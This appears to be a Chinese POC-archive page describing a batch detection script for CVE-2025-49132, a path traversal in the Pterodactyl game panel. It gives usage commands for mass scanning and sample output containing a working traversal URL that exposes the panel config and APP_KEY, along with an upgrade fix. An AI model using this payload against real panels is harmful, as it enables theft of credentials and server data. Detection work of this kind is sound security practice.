关联漏洞
描述
Pterodactyl翼龙面板CVE-2025-49132批量检测☝️🤓
介绍
# CVE-2025-49132_poc
## 使用示例
1. **扫描单个目标**:
```bash
python3 CVE-2025-49132_poc.py -u http://pterodactyl.example.com
```
2. **扫描目标列表**:
```bash
python3 CVE-2025-49132_poc.py -f 目标列表.txt
```
3. **保存扫描结果**:
```bash
python3 CVE-2025-49132_poc.py -f 目标列表.txt -o 扫描结果.txt
```
## 输出示例:
**存在漏洞时**:
```
[+] 存在漏洞: 漏洞确认
漏洞详情:
• 漏洞类型: 路径遍历
• 攻击向量: 通过路径遍历参数访问 /locales/locale.json
• 利用 URL: http://target.com/locales/locale.json?locale=..%2F..%2Fconfig&namespace=app
潜在影响:
• 读取面板配置文件 (.env) 中的凭据
• 提取数据库中的敏感信息
• 访问面板管理的游戏服务器文件
提取的 APP_KEY: base64{{your_secret_key_here}}
修复建议: 立即升级到 Pterodactyl v1.11.11 或更高版本
```
**不存在漏洞时**:
```
[-] 不存在漏洞: 不存在漏洞 (状态码: 404)
```
**扫描摘要**:
```
扫描摘要:
• 扫描目标总数: 5
• 存在漏洞的目标: 2
• 安全的目标: 3
[!] 严重: 检测到存在漏洞的系统! 需要立即采取措施。
```
文件快照
[4.0K] /data/pocs/cf6085ad9c556d2a6a3c182a38db75811cb764e2
├── [5.8K] CVE-2025-49132_poc.py
└── [1.2K] README.md
0 directories, 2 files
备注
1. 建议优先通过来源进行访问。
2. 如果因为来源失效或无法访问,请发送邮箱到 f.jinxu#gmail.com 索取本地快照(把 # 换成 @)。
3. 神龙已为您对POC代码进行快照,为了长期维护,请考虑为本地POC付费,感谢您的支持。